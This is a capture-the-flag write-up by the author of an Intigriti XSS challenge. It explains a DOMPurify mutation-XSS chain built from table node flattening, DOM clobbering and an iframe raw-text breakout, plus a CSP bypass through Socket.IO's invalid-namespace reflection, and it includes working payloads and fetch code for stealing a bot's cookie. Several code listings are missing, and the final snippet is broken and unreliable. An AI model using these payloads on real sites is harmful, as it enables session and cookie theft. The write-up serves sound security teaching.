This month, I authored a difficult XSS challenge for Intigriti, which ended up with only a few impressive solves. The idea occurred to me while exploring rabbit holes in another challenge, and I eventually got it to work after a lot of trial and error. The result is a fun Mutation XSS technique, combined with a more practical technique for bypassing CSPs using a powerful Socket.IO gadget.
You can still play the challenge at challenge-0725.intigriti.io before I spoil the solution. If you're just here to learn the techniques, here's a breakdown.
Summary:
- Notice DOMPurify allows id= attributes to DOM Clobber document.getElementById(...) calls, but only if the injected element comes before the original one. Our input normally gets injected into a <div id="chat-messages">.
- By nesting many <table> elements, node flattening is reached after 512 elements, and an <iframe> element can be put where it isn't supposed to be. After the reparse, the iframe gets moved out, above the table, allowing it to clobber id="chat-messages".
- Sending a second message now writes into the iframe's children, which are not escaped on serialization. Because it is a raw text element, it can be closed by <a id="</iframe>"> to allow Mutation XSS.
- Bypass the CSP using the Socket.IO polling endpoint, by sending a request for an invalid namespace that reflects the name in valid JavaScript syntax (44/alert(origin),{"message":"Invalid namespace"}). 💥
The Challenge
Upon first visiting the challenge page, we see a login screen that asks for a username to start a chat. In the bottom-right corner, there is also a button to download the challenge's source code:
We can download the source, unzip it, and then use docker compose up --build to start it locally. After that, it will be available on http://localhost:3000 for testing.
Entering a username, we get redirected to a random /chat/:uuid URL and see a chat interface:
Multiple users can join this chat to interact, and there is an Invite Bot button. The bot is the one we need to XSS to get the flag. We can see this in the code (app/index.js):
[code listing: bot route in app/index.js]
The GET endpoint shows a simple interface for passing a channel ID (the UUID in the URL), and sends a POST request to trigger the bot (app/bot.js):
The bot enters the chat and sends a message, then sits there for 10 seconds before leaving. Somehow, during this time, we need to trigger an XSS on them to leak the flag stored in their flag= cookie.
The messaging is implemented using Socket.IO with a channel for each chat on the server-side. Apart from that, there are no dynamic endpoints: everything returns static HTML (app/index.js) and a consistent list of security headers set by middleware:
[code listing: security headers middleware in app/index.js]
For XSS, we should focus on the client-side, especially JavaScript, to figure out how malicious scripts may be executed. The chat involves quite a bit of logic. Upon loading the page, we join the channel using Socket.IO and can send messages by submitting a form (app/public/chat.js):
[code listing: joining the channel and sending messages in app/public/chat.js]
The server handles this with the following function (app/index.js):
[code listing: server-side message handler in app/index.js]
This simply relays the message to everyone connected to the channel. They receive it in the following handler (app/public/chat.js):
// Receive messages
[code listing: client-side message handler in app/public/chat.js]
It creates a timestamp, a username, and a message text element. The latter is much more interesting than the rest because it parses our message.text as HTML using DOMPurify.
Another thing of note is the line all the way at the bottom, document.body.innerHTML = document.body.innerHTML. While assigning a property to itself may look like it does nothing, in this case, reading .innerHTML and assigning it back will first serialize and then reparse the DOM, which is known as a "round-trip". This is interesting in the case of HTML because, as the specification warns, the tree before and after a round-trip may be different! (spec)
DOM Clobbering
One attack that HTML sanitizers can hardly protect against is DOM Clobbering. It makes use of the strange browser feature where HTML elements are accessible in JavaScript via a shorthand: their id= attribute becomes a property on the window object. For example, an element like <img id="something"> will be accessible via the global variable something. There are no such gadgets in this application, but there is a more direct one.
There are many uses of document.getElementById(...), which essentially does the same. DOMPurify won't sanitize id= attributes, so we can try to hijack any of the elements the page looks for. One interesting target is chat-messages, because our HTML gets inserted into it every time a message is received. If we can override it with some obscure element that has special parsing rules, we may be able to do something similar to what @kevin_mizu presented here.
Before going there, we still need to make DOM Clobbering work. We can try to inject <svg id="chat-messages">, which will be allowed, but isn't instantly useful to overwrite document.getElementById("chat-messages"):
The problem is that it always returns the first element found in the tree, which can never be our input because our input is necessarily inside of the real chat messages, so it must come after it as a child. We either need to give up on this idea, or find a way to write our element somewhere before the regular chat messages element.
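The ordering problem can be illustrated with a toy model. This is only a sketch over plain objects, not a real DOM: the function name getElementByIdModel and the node shape { tag, id, children } are made up for this illustration. It mimics the "first match in tree order" lookup described above.

```javascript
// Toy model (not a real DOM): each node is { tag, id, children }.
function getElementByIdModel(root, id) {
  // Pre-order traversal: a node is checked before its children, and children
  // are visited left to right, so the first match in tree order wins.
  if (root.id === id) return root;
  for (const child of root.children ?? []) {
    const found = getElementByIdModel(child, id);
    if (found) return found;
  }
  return null;
}

const injected = { tag: "svg", id: "chat-messages", children: [] };
const real = { tag: "div", id: "chat-messages", children: [injected] };

// Our input is a descendant of the real element, so the real <div> is found first.
const nestedBody = { tag: "body", children: [real] };
console.log(getElementByIdModel(nestedBody, "chat-messages").tag); // div

// If the injected element could be moved in front of it, it would win instead.
const movedBody = { tag: "body", children: [injected, { ...real, children: [] }] };
console.log(getElementByIdModel(movedBody, "chat-messages").tag); // svg
```

The second case is exactly the situation we need to create in the real page.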
In previous Mutation XSS related writeups, a feature caught my attention. It's called "foster parenting" and is unique to <table> elements. What it does is move invalid elements in a table above it, for example:
<table><div>Hello, world!</div></table>
Turns into:
<div>Hello, world!</div><table></table>
The elements are suddenly re-ordered, which sounds useful for solving our problem. If we can just write an invalid element while the parser is in the "in-table" insertion mode, it should pop the element out somewhere higher, earlier in the DOM. It just so happens (😉) that the chat.html page is wrapped in a table layout like this:
...
Instant Realtime Communication
...
...
Creating an invalid element inside the <div id="chat-messages"> may pop it out above the top-most <table>, which will then be first in the DOM, and allow us to clobber chat-messages!
Creating an invalid element like this is easier said than done. Because our input is inside a <td> tag, it switches to the "in cell" insertion mode. From here, whatever tag we start has two possible options:
The "Anything else" case just parses as a regular body, so there is no chance to trigger foster parenting there. We need to get back to the table. It looks like <caption>, <col> and similar tags might allow this, though. We can try (Dom-Explorer):
This looks good! Would <col><div id="clobbered"> pass DOMPurify? The source code says it should, but when trying to do so, it still gets sanitized:
DOMPurify.sanitize('<col><div id="clobbered">');
// '<div id="clobbered"></div>'
Looking further, even without sanitizing it gets removed when using DOMParser.parseFromString():
new DOMParser().parseFromString('<col><div id="clobbered">', "text/html").body.innerHTML;
// '<div id="clobbered"></div>'
Is the browser sanitizing this by itself?! No, this happens because <col> is not valid in the body context that it starts in:
Unfortunately, the same applies to all the alternative elements we found for escaping the <td>: they are ignored when parsed in the body rather than in a table. We can't escape the <td> because none of the elements that would allow it are allowed directly in the <body>.
Node flattening
At this point, you may be thinking about nested tables and how the parsing would interact there. Maybe it's possible to find some combination of elements that is allowed in the "in body" insertion mode, so that DOMPurify lets it through. Then, when the browser inserts it into the real DOM inside the table, it would no longer be valid there, and foster parenting would move our injected element above the table.
Another good idea for creating weird situations is a trick semi-recently discovered by @IcesFont which triggered a chain reaction of many DOMPurify bypasses in a short time. The trick utilizes "node flattening", where the browser will limit how deeply nested elements may be. Simply said, it will stop nesting the elements after 512 levels:
<-- Notice these don't go deeper
The important fact here is that during serialization, the deeper elements also aren't nested anymore; in the above example, it will end up with 3 self-closing <div> tags. Remember the document.body.innerHTML = document.body.innerHTML operation we noticed? It causes a round-trip, which is serialization and reparsing. We can create a DOM tree that's parsed as a lot of nested elements and inserted into the DOM as such. During serialization, the deepest nested elements are flattened, causing them to get into situations that may normally be impossible. The parsing will then have to deal with that and potentially cause mutations.
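To experiment with this limit, deeply nested markup has to be generated rather than typed. Below is a minimal sketch of such a generator. The helper name buildNested is hypothetical and only produces a string; what the browser does with it is left for you to observe in a parser playground.

```javascript
// Hypothetical helper for experiments: wraps `inner` in `depth` levels of <tag>.
function buildNested(tag, depth, inner = "") {
  return `<${tag}>`.repeat(depth) + inner + `</${tag}>`.repeat(depth);
}

// Nesting limit quoted in the text above.
const DEPTH_LIMIT = 512;

// Go a few levels past the limit so the innermost elements are affected.
const probe = buildNested("div", DEPTH_LIMIT + 3, "x");
console.log(probe.slice(0, 20) + "...");
```

Parsing probe once and then serializing and reparsing it is one way to compare the tree before and after a round-trip.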
For this challenge, we can make an example with a table deeply nested to the limit. Once flattened and reparsed, the result is very interesting (Dom-Explorer):
The first DomParser represents what DOMPurify sees (minus the <table><tr><td> prefix): everything is deeply nested but still inside the root table. However, the second DomParser is what the DOM looks like after a round-trip: the <div id="chat-messages"> has moved up above the topmost <table>. This is because after the first parsing, node flattening pushed it out of its <td>. It is now directly inside the <tbody>, which isn't allowed, so foster parenting moves it up above the table. Because it has now moved above the real chat-messages, we should have clobbered the element, and any future messages will be inserted into it!
Mutation XSS
Now, back to our original plan. What if we made the clobbered element a special one like <svg>, and then used the following payload, which worked in DOMPurify 3.0.6:
a
Unfortunately, the above payload doesn't make it through the latest version anymore (Dom-Explorer):
a
Both the <style> tag and the <a> tag's id= attribute were removed. The first is due to this check (/<[/\w!]/g), which removes any elements without children that still contain HTML tags, such as our <style> tag. The second is due to this other check (/((--!?|])>)|<\/(style|title)/i) that sanitizes attributes containing closing comments or closing style and title tags. These checks harden against some known namespace confusion attacks and make it much harder to achieve a bypass.
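The two patterns can be tried in isolation to get a feel for what they catch. The sketch below only exercises the regular expressions quoted above against a few strings. The function names are made up for this illustration, and it does not reproduce the surrounding DOMPurify logic that decides when each check runs.

```javascript
// The two patterns quoted above. The `g` flag of the first one is dropped here so
// that repeated .test() calls do not carry lastIndex state between inputs.
const MARKUP_IN_TEXT = /<[/\w!]/;
const DANGEROUS_ATTR_VALUE = /((--!?|])>)|<\/(style|title)/i;

// Hypothetical wrappers, named for readability only.
function textLooksLikeMarkup(text) {
  return MARKUP_IN_TEXT.test(text);
}
function attributeValueIsRejected(value) {
  return DANGEROUS_ATTR_VALUE.test(value);
}

const attributeSamples = [
  "</style><img src onerror=alert()>", // closing style tag
  "--><img src>", // closing comment
  "</iframe><img src onerror=alert(origin)>", // some other closing tag
  "chat-messages", // ordinary value
];
for (const value of attributeSamples) {
  console.log(JSON.stringify(value), attributeValueIsRejected(value));
}
```

Only the first two samples match the attribute pattern; closing tags other than style and title are not covered by it.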
Still, we have a pretty powerful primitive on our hands. We are able to target DOMPurify's output into any element we want. Instead of stopping at <svg>, why not directly insert into a <style> tag? Then DOMPurify will try to sanitize it as HTML, but it's inserted as CSS. These are very different contexts. We could write something like <a id="</style><img src onerror=alert()>">, for example, which DOMPurify will see as just an <a> tag with an attribute. When surrounded by a style tag, however, the parser closes the style upon seeing </style> and, back in HTML, triggers XSS with the image.
Unfortunately, this hits the extra attribute check from DOMPurify again... What other tags similar to <style> are there that serialize their contents without escaping them, and parse as text? This is actually a pretty well-defined selection:
We get to choose between style, script, xmp, iframe, noembed, noframes, or plaintext. Of these, only style is allowed by default. But the configuration we're dealing with has an exception:
We're allowed <iframe> tags, and best of all, a closing </iframe> tag is allowed in attributes by the DOMPurify regular expression! This means our solution will be to use DOM Clobbering to create an <iframe id="chat-messages">, and then send a second message that writes the following content into it: <a id="</iframe><img src onerror=alert(origin)>">. After the round-trip, this should interpret the image as a real HTML tag and trigger the XSS. Let's try it:
Success! Well... kind of. We successfully injected our XSS payload, but it doesn't trigger yet because of a CSP. What is it defined as?
Alright, no obvious bypasses yet, we'll have to investigate this a little further before we see our shiny alert.
CSP Bypass using Socket.IO
script-src 'self' is most important to us, because at some point we want to run scripts. The rule means we may only load scripts from the current host, so any relative path works. There aren't many candidates in this challenge because all endpoints only return static HTML, JS, or CSS files. But we can see one creeping around in our Network tab:
This Socket.IO endpoint with ?transport=polling returns some weirdly formatted data with Content-Type: text/plain. It's a simple GET request with a special URL. Is there a chance we could use such a response containing arbitrary JavaScript to bypass the CSP? You might quickly say no because the /chat/:uuid endpoint responds with:
But it is important to understand that this header only applies to the response it is set on, not the whole document. These Socket.IO responses don't have an X-Content-Type-Options header, so by default they are allowed to be loaded as any content type, including JavaScript. But can we really make this weird custom protocol return valid JavaScript to perform our flag exfiltration?
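The reasoning above can be written down as a small decision function. This is a deliberately simplified model, not how any browser is implemented: scriptLoadAllowed is a made-up name, script-src 'self' is reduced to a same-origin comparison, the MIME list is abbreviated, and the /socket.io/ path, chat ID, and sid value are placeholder assumptions.

```javascript
// Abbreviated list of JavaScript MIME types (browsers accept a few more legacy ones).
const JS_MIME_TYPES = new Set([
  "text/javascript",
  "application/javascript",
  "application/x-javascript",
  "application/ecmascript",
  "text/ecmascript",
]);

// Simplified model: may `scriptUrl` run as a <script src> on `pageUrl`?
function scriptLoadAllowed({ pageUrl, scriptUrl, contentType, nosniff }) {
  const page = new URL(pageUrl);
  const script = new URL(scriptUrl, page);
  // script-src 'self', modeled as a plain same-origin comparison.
  if (script.origin !== page.origin) return false;
  const essence = (contentType ?? "").split(";")[0].trim().toLowerCase();
  // With nosniff on the script response, only JavaScript MIME types may execute.
  if (nosniff) return JS_MIME_TYPES.has(essence);
  // Without it, only a few clearly non-script types are refused.
  return !(/^(image|audio|video)\//.test(essence) || essence === "text/csv");
}

// Placeholder values standing in for the polling response seen in the Network tab.
const pollingResponse = {
  pageUrl: "http://localhost:3000/chat/example-id",
  scriptUrl: "/socket.io/?EIO=4&transport=polling&sid=example",
  contentType: "text/plain; charset=UTF-8",
};
console.log(scriptLoadAllowed({ ...pollingResponse, nosniff: false })); // true
console.log(scriptLoadAllowed({ ...pollingResponse, nosniff: true })); // false
```

The header on the chat page never enters this function, which is the point: only the headers of the script response itself matter.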
We already see examples where part of our input, the messages, is returned in the response. The problem is that these are always correctly JSON-formatted when they come from the server. Still, they happen to be valid JavaScript, which is promising if we can find variations of this.
> 42
< undefined
https://socket.io/docs/v4/socket-io-protocol/
We can read the above protocol description to learn about all the different things it can output. One example stands out:
With a custom namespace:
Packet: { type: EVENT, namespace: "/admin", data: ["bar"] }
Encoded: 2/admin,["bar"]
If we were to run this in JavaScript, it would try to resolve the admin variable. We can replace it with alert() later:
> 2/admin,
< Uncaught ReferenceError: admin is not defined
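To make the encoding rule concrete, here is a minimal sketch of an encoder that follows the packet layout from the protocol description. It ignores acknowledgement IDs and binary attachments, and the function names, the "message" event name, and its payload are assumptions made for this illustration.

```javascript
// Socket.IO packet types, as numbered in the protocol description.
const PacketType = { CONNECT: 0, DISCONNECT: 1, EVENT: 2, ACK: 3, CONNECT_ERROR: 4 };

// Minimal encoder: <type>[<namespace>,][<JSON payload>]
function encodePacket({ type, namespace = "/", data }) {
  let out = String(type);
  // The namespace is only written when it is not the default "/",
  // and it is terminated by a comma.
  if (namespace !== "/") out += namespace + ",";
  if (data !== undefined) out += JSON.stringify(data);
  return out;
}

// Over the polling transport, each Socket.IO packet travels inside an
// Engine.IO "message" packet, which is marked by a leading "4".
const ENGINE_IO_MESSAGE = "4";
function toPollingPayload(packet) {
  return ENGINE_IO_MESSAGE + encodePacket(packet);
}

console.log(encodePacket({ type: PacketType.EVENT, namespace: "/admin", data: ["bar"] }));
// 2/admin,["bar"]
console.log(toPollingPayload({ type: PacketType.EVENT, data: ["message", { text: "hi" }] }));
// 42["message",{"text":"hi"}]
```

Because the namespace is copied into the output without quoting, whatever we choose as a namespace ends up as bare text in front of the comma.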
But this is a packet from the client, we need one that the server sends to us as a response. Let's try to forge the above packet anyway and see what the server does with it:
.
The error in the response is... wait...
44/admin,{"message":"Invalid namespace"}
The error message is valid JavaScript, including our namespace input! All we have to do now is prepare such a URL without requesting it ourselves, as that would consume the response. Polling works like this:
1. Request a new session ID
2. Start a GET request that won't get a response yet
3. Send a POST request with your message
4. Finally, the GET request from step 2 gets resolved to the result from step 3
So we simply need to do steps 1 and 3 on our side, then craft the URL one would normally request for step 2 and give it to the victim, so that step 4 happens inside their browser during the XSS. It should return our prepared content and execute some JavaScript payload.
Half-following the protocol like this isn't possible with the official Socket.IO API, so we'll have to go a bit more manual and use raw fetch() requests, inspired by what we see going back and forth in the Network tab:
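// Step 1 (request session ID)
// Assumes the default /socket.io/ path and Engine.IO v4 (EIO=4), as seen in the Network tab
res = await fetch("/socket.io/?EIO=4&transport=polling").then((r) => r.text());
sid = JSON.parse(res.slice(1)).sid; // the handshake looks like 0{"sid":"...",...}
// Step 3 (send POST message)
await fetch("/socket.io/?EIO=4&transport=polling&sid=" + sid, {
  method: "POST",
  body: "40/alert(origin),", // CONNECT packet for the invalid namespace /alert(origin)
});
// Step 2 (craft URL for response)
url = "/socket.io/?" + new URLSearchParams({ EIO: 4, transport: "polling", sid });
console.log(url);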
This prints a URL that, when viewed in the browser, responds with:
44/alert(origin),{"message":"Invalid namespace"}
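It may not be obvious that this text really runs as a script, so here is a small sketch that evaluates it outside the browser. It uses new Function with stand-ins for alert and origin (both stubs are assumptions of this example), which parses the text as a function body rather than as a script, but this expression is handled the same way in both.

```javascript
// The response body reflected by the polling endpoint.
const response = '44/alert(origin),{"message":"Invalid namespace"}';

// Record calls instead of showing a dialog, since this runs outside a browser.
const calls = [];
const fakeAlert = (value) => {
  calls.push(value);
};

// Parsed as: (44 / alert(origin)), ({ message: "Invalid namespace" })
// The division forces alert(origin) to be evaluated; the object literal is discarded.
const run = new Function("alert", "origin", response);
run(fakeAlert, "http://localhost:3000");

console.log(calls); // [ 'http://localhost:3000' ]
```

The leading 44/ turns into a harmless division and the trailing JSON into an unused object literal, so only our namespace has any effect.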
We now need to put this into a <script src="..."> using our Mutation XSS, to get it to bypass the CSP. Because our sink of .innerHTML doesn't execute script tags, we need to wrap it in an <iframe srcdoc="...">, which creates a new document that does load script tags. This is no problem for us at this point, because we've completely bypassed the sanitizer.
The JavaScript snippet below will trigger the XSS via the received messages:
The final goal is to steal the flag= cookie from the Bot. We can invite it to our chat, and then send the above messages again to trigger XSS on it and exfiltrate the cookies. All that's left to do is update the POST body to use a flag-stealing payload that reads document.cookie and sends it back to us as a message.
body:
Then we send it over the chat right after inviting the bot, making sure not to XSS ourselves at this point, as that would invalidate the polling URL. This can simply be done by overwriting a function, for example DOMPurify.sanitize = console.log;.
// Run this when the bot joins right after pressing *Invite Bot*
DOMPurify.sanitize = console.log; // Prevent XSS'ing ourselves, but still see response messages
res = await .;
sid = ;
await ;
url = + new;
If timed correctly, we quickly receive a message back from the bot containing the flag!
flag=CTF{st4Ck1Ng_T4Bl3S_'t1Ll_1T_C0M3S_Cr4Sh1Ng_D0Wn,_S0Ck3T10_1S_Such_4_Gr34T_G4Dg3T!}